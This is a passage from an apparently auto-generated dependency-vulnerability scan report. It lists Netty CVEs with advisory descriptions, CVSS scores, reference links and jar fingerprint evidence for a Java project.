https://lists.apache.org/thread.html/r16c4b55ac82be72f28adad4f8061477e5f978199d5725691dcc82c24%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r2e93ce23e04c3f0a61e987d1111d0695cb668ac4ec4edbf237bd3e80%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r490ca5611c150d193b320a2608209180713b7c68e501b67b0cffb925%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r57245853c7245baab09eae08728c52b58fd77666538092389cc3e882%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r6d32fc3cd547f7c9a288a57c7f525f5d00a00d5d163613e0d10a23ef%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r8bcaf7821247b1836b10f6a1a3a3212b06272fd4cde4a859de1b78cf%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r8db1d7b3b9acc9e8d2776395e280eb9615dd7790e1da8c57039963de%40%3Cnotifications.zookeeper.apache.org%3E - https://lists.apache.org/thread.html/ra96c74c37ed7252f78392e1ad16442bd16ae72a4d6c8db50dd55c88b%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/racc191a1f70a4f13155e8002c61bddef2870b26441971c697436ad5d%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rae198f44c3f7ac5264045e6ba976be1703cff38dcf1609916e50210d%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rb523bb6c60196c5f58514b86a8585c2069a4852039b45de3818b29d2%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rc73b8dd01b1be276d06bdf07883ecd93fe1a01f139a99ef30ba4308c%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rcfc154eb2de23d2dc08a56100341161e1a40a8ea86c693735437e8f2%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rd25c88aad0e76240dd09f0eb34bdab924933946429e068a167adcb73%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rdb4db3f5a9c478ca52a7b164680b88877a5a9c174e7047676c006b2c%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/re4f70b62843e92163fab03b65e2aa8078693293a0c36f1cc260079ed%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/reafc834062486adfc7be5bb8f7b7793be0d33f483678a094c3f9d468%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rf87b870a22aa5c77c27900967b518a71a7d954c2952860fce3794b60%40%3Ccommits.servicecomb.apache.org%3E CONFIRM - https://github.com/netty/netty/security/advisories/GHSA-wm47-8v5p-wjpj CONFIRM - https://security.netapp.com/advisory/ntap-20210604-0003/ DEBIAN - DSA-4885 MISC - https://github.com/Netflix/zuul/pull/980 MISC - https://github.com/netty/netty/commit/89c241e3b1795ff257af4ad6eadc616cb2fb3dc4 MISC - https://www.oracle.com/security-alerts/cpuapr2022.html OSSINDEX - [CVE-2021-21295] CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') OSSINDEX - [CVE-2021-21295] CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21295 OSSIndex - https://github.com/netty/netty/security/advisories/GHSA-wm47-8v5p-wjpj OSSIndex - https://lists.apache.org/thread/ztx01jknlcoq0v6pp2cwl609dyzk9r5h Vulnerable Software & Versions: (show all )
CVE-2021-21409 suppress
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty (io.netty:netty-codec-http2) before version 4.1.61.Final there is a vulnerability that enables request smuggling. The content-length header is not correctly validated if the request only uses a single Http2HeaderFrame with the endStream set to to true. This could lead to request smuggling if the request is proxied to a remote peer and translated to HTTP/1.1. This is a followup of GHSA-wm47-8v5p-wjpj/CVE-2021-21295 which did miss to fix this one case. This was fixed as part of 4.1.61.Final. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2021-21290 suppress
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty before version 4.1.59.Final there is a vulnerability on Unix-like systems involving an insecure temp file. When netty's multipart decoders are used local information disclosure can occur via the local system temporary directory if temporary storing uploads on the disk is enabled. On unix-like systems, the temporary directory is shared between all user. As such, writing to this directory using APIs that do not explicitly set the file/directory permissions can lead to information disclosure. Of note, this does not impact modern MacOS Operating Systems. The method "File.createTempFile" on unix-like systems creates a random file, but, by default will create this file with the permissions "-rw-r--r--". Thus, if sensitive information is written to this file, other local users can read this information. This is the case in netty's "AbstractDiskHttpData" is vulnerable. This has been fixed in version 4.1.59.Final. As a workaround, one may specify your own "java.io.tmpdir" when you start the JVM or use "DefaultHttpDataFactory.setBaseDir(...)" to set the directory to something that is only readable by the current user. CWE-378 Creation of Temporary File With Insecure Permissions, CWE-379 Creation of Temporary File in Directory with Incorrect Permissions
CVSSv2:
Base Score: LOW (1.9) Vector: /AV:L/AC:M/Au:N/C:P/I:N/A:N CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2022-24823 suppress
Netty is an open-source, asynchronous event-driven network application framework. The package `io.netty:netty-codec-http` prior to version 4.1.77.Final contains an insufficient fix for CVE-2021-21290. When Netty's multipart decoders are used local information disclosure can occur via the local system temporary directory if temporary storing uploads on the disk is enabled. This only impacts applications running on Java version 6 and lower. Additionally, this vulnerability impacts code running on Unix-like systems, and very old versions of Mac OSX and Windows as they all share the system temporary directory between all users. Version 4.1.77.Final contains a patch for this vulnerability. As a workaround, specify one's own `java.io.tmpdir` when starting the JVM or use DefaultHttpDataFactory.setBaseDir(...) to set the directory to something that is only readable by the current user. CWE-378 Creation of Temporary File With Insecure Permissions, CWE-379 Creation of Temporary File in Directory with Incorrect Permissions, CWE-668 Exposure of Resource to Wrong Sphere
CVSSv2:
Base Score: LOW (1.9) Vector: /AV:L/AC:M/Au:N/C:P/I:N/A:N CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N References:
Vulnerable Software & Versions: (show all )
netty-codec-mqtt-4.1.49.Final.jarDescription:
Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers and clients. License:
http://www.apache.org/licenses/LICENSE-2.0 File Path: /var/simplicite/.m2/repository/io/netty/netty-codec-mqtt/4.1.49.Final/netty-codec-mqtt-4.1.49.Final.jar
MD5: 14e4d0ff5219c11a43001f55712d0735
SHA1: 5a71467b1a92cc3a7a6e8dd12dc69af33089a067
SHA256: b2f7bf31bececabdfdf65418831c358f4be61ce185e1b044bb274c0bf99e61a9
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name netty-codec-mqtt High Vendor jar package name codec Highest Vendor jar package name io Highest Vendor jar package name netty Highest Vendor Manifest automatic-module-name io.netty.codec.mqtt Medium Vendor Manifest bundle-docurl https://netty.io/ Low Vendor Manifest bundle-symbolicname io.netty.codec-mqtt Medium Vendor Manifest implementation-url https://netty.io/netty-codec-mqtt/ Low Vendor Manifest Implementation-Vendor The Netty Project High Vendor Manifest Implementation-Vendor-Id io.netty Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Vendor pom artifactid netty-codec-mqtt Highest Vendor pom artifactid netty-codec-mqtt Low Vendor pom groupid io.netty Highest Vendor pom name Netty/Codec/MQTT High Vendor pom parent-artifactid netty-parent Low Product file name netty-codec-mqtt High Product jar package name codec Highest Product jar package name io Highest Product jar package name netty Highest Product Manifest automatic-module-name io.netty.codec.mqtt Medium Product Manifest bundle-docurl https://netty.io/ Low Product Manifest Bundle-Name Netty/Codec/MQTT Medium Product Manifest bundle-symbolicname io.netty.codec-mqtt Medium Product Manifest Implementation-Title Netty/Codec/MQTT High Product Manifest implementation-url https://netty.io/netty-codec-mqtt/ Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Product pom artifactid netty-codec-mqtt Highest Product pom groupid io.netty Highest Product pom name Netty/Codec/MQTT High Product pom parent-artifactid netty-parent Medium Version Manifest Bundle-Version 4.1.49.Final High Version Manifest Implementation-Version 4.1.49.Final High Version pom version 4.1.49.Final Highest
CVE-2021-37136 suppress
The Bzip2 decompression decoder function doesn't allow setting size restrictions on the decompressed output data (which affects the allocation size used during decompression). All users of Bzip2Decoder are affected. The malicious input can trigger an OOME and so a DoS attack CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2021-37137 suppress
The Snappy frame decoder function doesn't restrict the chunk length which may lead to excessive memory usage. Beside this it also may buffer reserved skippable chunks until the whole chunk was received which may lead to excessive memory usage as well. This vulnerability can be triggered by supplying malicious input that decompresses to a very big size (via a network stream or a file) or by sending a huge skippable chunk. CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2022-41881 suppress
Netty project is an event-driven asynchronous network application framework. In versions prior to 4.1.86.Final, a StackOverflowError can be raised when parsing a malformed crafted message due to an infinite recursion. This issue is patched in version 4.1.86.Final. There is no workaround, except using a custom HaProxyMessageDecoder. CWE-674 Uncontrolled Recursion
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
CVE-2023-44487 suppress
The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023. CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2021-43797 suppress
Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. Netty prior to version 4.1.71.Final skips control chars when they are present at the beginning / end of the header name. It should instead fail fast as these are not allowed by the spec and could lead to HTTP request smuggling. Failing to do the validation might cause netty to "sanitize" header names before it forward these to another remote system when used as proxy. This remote system can't see the invalid usage anymore, and therefore does not do the validation itself. Users should upgrade to version 4.1.71.Final. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2023-34462 suppress
Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. The `SniHandler` can allocate up to 16MB of heap for each channel during the TLS handshake. When the handler or the channel does not have an idle timeout, it can be used to make a TCP server using the `SniHandler` to allocate 16MB of heap. The `SniHandler` class is a handler that waits for the TLS handshake to configure a `SslHandler` according to the indicated server name by the `ClientHello` record. For this matter it allocates a `ByteBuf` using the value defined in the `ClientHello` record. Normally the value of the packet should be smaller than the handshake packet but there are not checks done here and the way the code is written, it is possible to craft a packet that makes the `SslClientHelloHandler`. This vulnerability has been fixed in version 4.1.94.Final. CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
CVE-2021-21295 suppress
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty (io.netty:netty-codec-http2) before version 4.1.60.Final there is a vulnerability that enables request smuggling. If a Content-Length header is present in the original HTTP/2 request, the field is not validated by `Http2MultiplexHandler` as it is propagated up. This is fine as long as the request is not proxied through as HTTP/1.1. If the request comes in as an HTTP/2 stream, gets converted into the HTTP/1.1 domain objects (`HttpRequest`, `HttpContent`, etc.) via `Http2StreamFrameToHttpObjectCodec `and then sent up to the child channel's pipeline and proxied through a remote peer as HTTP/1.1 this may result in request smuggling. In a proxy case, users may assume the content-length is validated somehow, which is not the case. If the request is forwarded to a backend channel that is a HTTP/1.1 connection, the Content-Length now has meaning and needs to be checked. An attacker can smuggle requests inside the body as it gets downgraded from HTTP/2 to HTTP/1.1. For an example attack refer to the linked GitHub Advisory. Users are only affected if all of this is true: `HTTP2MultiplexCodec` or `Http2FrameCodec` is used, `Http2StreamFrameToHttpObjectCodec` is used to convert to HTTP/1.1 objects, and these HTTP/1.1 objects are forwarded to another remote peer. This has been patched in 4.1.60.Final As a workaround, the user can do the validation by themselves by implementing a custom `ChannelInboundHandler` that is put in the `ChannelPipeline` behind `Http2StreamFrameToHttpObjectCodec`. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2:
Base Score: LOW (2.6) Vector: /AV:N/AC:H/Au:N/C:N/I:P/A:N CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N References:
- [bookkeeper-issues] 20210330 [GitHub] [bookkeeper] eolivelli opened a new issue #2669: Update Netty to 4.1.60.final - [flink-dev] 20210424 [jira] [Created] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [flink-issues] 20210424 [jira] [Created] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [flink-issues] 20210426 [jira] [Commented] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [flink-issues] 20210426 [jira] [Updated] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [flink-issues] 20210511 [jira] [Commented] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [flink-issues] 20210610 [jira] [Updated] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [flink-issues] 20210618 [jira] [Updated] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [hbase-commits] 20210402 [hbase-thirdparty] branch master updated: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 (#48) - [hbase-dev] 20210402 [jira] [Created] (HBASE-25728) [hbase-thirdparty] ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] Apache-HBase commented on pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] HorizonNet commented on pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] apurtell commented on pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] apurtell merged pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] apurtell opened a new pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [jira] [Assigned] (HBASE-25728) [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [jira] [Created] (HBASE-25728) [hbase-thirdparty] ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [jira] [Updated] (HBASE-25728) [hbase-thirdparty] Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [jira] [Updated] (HBASE-25728) [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [jackrabbit-dev] 20210709 [GitHub] [jackrabbit-oak] blackat opened a new pull request #321: Update netty to resolve CVE-2021-21295 and BDSA-2018-4022 - [kafka-dev] 20210330 [jira] [Created] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295 - [kafka-dev] 20210401 [jira] [Resolved] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295 - [kafka-jira] 20210330 [jira] [Created] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295 - [kafka-jira] 20210330 [jira] [Updated] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295 - [kafka-jira] 20210331 [GitHub] [kafka] dongjinleekr commented on pull request #10448: KAFKA-12583: Upgrade of netty-codec due to CVE-2021-21295 - [kafka-jira] 20210331 [GitHub] [kafka] dongjinleekr opened a new pull request #10448: KAFKA-12583: Upgrade of netty-codec due to CVE-2021-21295 - [kafka-jira] 20210401 [jira] [Commented] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295 - [kafka-jira] 20210401 [jira] [Resolved] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295 - [kafka-jira] 20210402 [jira] [Assigned] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295 - [kudu-issues] 20210904 [jira] [Created] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60 - [kudu-issues] 20210904 [jira] [Updated] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60 - [kudu-issues] 20210907 [jira] [Commented] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60 - [kudu-issues] 20210907 [jira] [Resolved] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60 - [kudu-issues] 20210907 [jira] [Updated] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60 - [pulsar-commits] 20210329 [GitHub] [pulsar] aahmed-se opened a new pull request #10073: Upgrade Netty version to 4.1.60.final - [pulsar-commits] 20210329 [GitHub] [pulsar] merlimat closed issue #10071: CVE-2021-21295 & CVE-2021-21290 - [pulsar-commits] 20210329 [GitHub] [pulsar] yaswanthnadella opened a new issue #10071: CVE-2021-21295 & CVE-2021-21290 - [pulsar-commits] 20211020 [GitHub] [pulsar] Shoothzj opened a new pull request #12437: [Security] Bump grpc to 1.41.0 - [ranger-dev] 20210317 [jira] [Assigned] (RANGER-3209) Upgrade netty to 4.1.60+ due to CVE-2021-21290 and CVE-2021-21295 - [ranger-dev] 20210317 [jira] [Created] (RANGER-3209) Upgrade netty to 4.1.60+ due to CVE-2021-21290 and CVE-2021-21295 - [zookeeper-commits] 20210331 [zookeeper] branch branch-3.5 updated: ZOOKEEPER-4272 ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-commits] 20210331 [zookeeper] branch branch-3.6 updated: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-commits] 20210331 [zookeeper] branch branch-3.7 updated: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-commits] 20210331 [zookeeper] branch master updated: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-dev] 20210330 [jira] [Created] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-dev] 20210928 [jira] [Created] (ZOOKEEPER-4390) CVE-2021-28169 - Upgrade jetty to 9.4.42 - [zookeeper-issues] 20210330 [jira] [Created] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210330 [jira] [Updated] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210331 [jira] [Assigned] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210331 [jira] [Commented] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210331 [jira] [Resolved] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210331 [jira] [Updated] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210401 [jira] [Commented] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210402 [jira] [Commented] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-issues] 20210928 [jira] [Created] (ZOOKEEPER-4390) CVE-2021-28169 - Upgrade jetty to 9.4.42 - [zookeeper-issues] 20210928 [jira] [Updated] (ZOOKEEPER-4390) CVE-2021-28169 , - Upgrade jetty to 9.4.42 - [zookeeper-issues] 20210928 [jira] [Updated] (ZOOKEEPER-4390) CVE-2021-28169 , CVE-2021-28163, - Upgrade jetty to 9.4.42 - [zookeeper-issues] 20210928 [jira] [Updated] (ZOOKEEPER-4390) CVE-2021-28169 , CVE-2021-28163, CVE-2021-34428- Upgrade jetty to 9.4.42 - [zookeeper-issues] 20210928 [jira] [Updated] (ZOOKEEPER-4390) CVE-2021-28169 - Upgrade jetty to 9.4.42 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] arshadmohammad closed pull request #1670: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] arshadmohammad commented on pull request #1669: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] arshadmohammad commented on pull request #1670: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] asfgit closed pull request #1669: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] ayushmantri opened a new pull request #1669: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] ayushmantri opened a new pull request #1670: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [zookeeper-notifications] 20210331 [GitHub] [zookeeper] eolivelli commented on pull request #1669: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - https://lists.apache.org/thread.html/r04a3e0d9f53421fb946c60cc54762b7151dc692eb4e39970a7579052%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r16c4b55ac82be72f28adad4f8061477e5f978199d5725691dcc82c24%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r2e93ce23e04c3f0a61e987d1111d0695cb668ac4ec4edbf237bd3e80%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r490ca5611c150d193b320a2608209180713b7c68e501b67b0cffb925%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r57245853c7245baab09eae08728c52b58fd77666538092389cc3e882%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r6d32fc3cd547f7c9a288a57c7f525f5d00a00d5d163613e0d10a23ef%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r8bcaf7821247b1836b10f6a1a3a3212b06272fd4cde4a859de1b78cf%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/r8db1d7b3b9acc9e8d2776395e280eb9615dd7790e1da8c57039963de%40%3Cnotifications.zookeeper.apache.org%3E - https://lists.apache.org/thread.html/ra96c74c37ed7252f78392e1ad16442bd16ae72a4d6c8db50dd55c88b%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/racc191a1f70a4f13155e8002c61bddef2870b26441971c697436ad5d%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rae198f44c3f7ac5264045e6ba976be1703cff38dcf1609916e50210d%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rb523bb6c60196c5f58514b86a8585c2069a4852039b45de3818b29d2%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rc73b8dd01b1be276d06bdf07883ecd93fe1a01f139a99ef30ba4308c%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rcfc154eb2de23d2dc08a56100341161e1a40a8ea86c693735437e8f2%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rd25c88aad0e76240dd09f0eb34bdab924933946429e068a167adcb73%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rdb4db3f5a9c478ca52a7b164680b88877a5a9c174e7047676c006b2c%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/re4f70b62843e92163fab03b65e2aa8078693293a0c36f1cc260079ed%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/reafc834062486adfc7be5bb8f7b7793be0d33f483678a094c3f9d468%40%3Ccommits.servicecomb.apache.org%3E - https://lists.apache.org/thread.html/rf87b870a22aa5c77c27900967b518a71a7d954c2952860fce3794b60%40%3Ccommits.servicecomb.apache.org%3E CONFIRM - https://github.com/netty/netty/security/advisories/GHSA-wm47-8v5p-wjpj CONFIRM - https://security.netapp.com/advisory/ntap-20210604-0003/ DEBIAN - DSA-4885 MISC - https://github.com/Netflix/zuul/pull/980 MISC - https://github.com/netty/netty/commit/89c241e3b1795ff257af4ad6eadc616cb2fb3dc4 MISC - https://www.oracle.com/security-alerts/cpuapr2022.html OSSINDEX - [CVE-2021-21295] CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') OSSINDEX - [CVE-2021-21295] CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21295 OSSIndex - https://github.com/netty/netty/security/advisories/GHSA-wm47-8v5p-wjpj OSSIndex - https://lists.apache.org/thread/ztx01jknlcoq0v6pp2cwl609dyzk9r5h Vulnerable Software & Versions: (show all )
CVE-2021-21409 suppress
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty (io.netty:netty-codec-http2) before version 4.1.61.Final there is a vulnerability that enables request smuggling. The content-length header is not correctly validated if the request only uses a single Http2HeaderFrame with the endStream set to to true. This could lead to request smuggling if the request is proxied to a remote peer and translated to HTTP/1.1. This is a followup of GHSA-wm47-8v5p-wjpj/CVE-2021-21295 which did miss to fix this one case. This was fixed as part of 4.1.61.Final. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2021-21290 suppress
